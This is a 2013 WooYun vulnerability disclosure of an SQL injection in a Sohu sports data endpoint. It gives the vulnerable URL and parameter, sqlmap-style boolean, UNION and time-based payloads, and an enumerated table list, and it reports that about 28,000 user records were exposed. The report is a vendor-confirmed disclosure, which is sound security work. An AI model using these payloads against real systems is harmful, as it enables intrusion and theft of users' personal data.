当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038318

漏洞标题:搜狐某站sql注入导致数万用户信息泄露

相关厂商:搜狐

漏洞作者: 霍大然

提交时间:2013-09-27 10:40

修复时间:2013-11-11 10:41

公开时间:2013-11-11 10:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

搜狐某站sql注入导致严重信息泄露,包括(各种sohu库,数据库管理员的内部用户名与hash),只看了一个库,某用户表28110用户,包括手机号等信息泄露

详细说明:

问题网站地址:http://data.sports.sohu.com

1-1.PNG


注入点:
http://data.sports.sohu.com/nba/json/get_player_enc.php?teamid=6 (GET)
Place: GET
Parameter: teamid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: teamid=6 AND 1443=1443
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: teamid=6 UNION ALL SELECT NULL,CONCAT(0x717a6a6f71,0x61454276756c63646574,0x71727a7171)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: teamid=6 AND SLEEP(5)
数据库:

1-2.PNG


相关用户及hash:

1-3.PNG


1-4.PNG

漏洞证明:

女人栏目的数据库
web application technology: PHP 5.2.5
back-end DBMS: MySQL 5.0.11
Database: women
[18 tables]
+---------------------------+
| activity |
| activity_element_relation |
| brand |
| corp |
| feature |
| fragment_manage |
| message_tpl |
| need_add_activity |
| operation_log |
| product_category |
| recommend |
| report |
| report_feature |
| report_lolitabox |
| user_activity_info |
| user_activity_relation |
| user_extends |
| user_info |
+---------------------------+
用户表:

1-5.PNG


1-7.PNG


修复方案:

参数过滤

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-27 10:52

厂商回复:

感谢对sohu安全的支持。

最新状态:

暂无


漏洞评价:

评论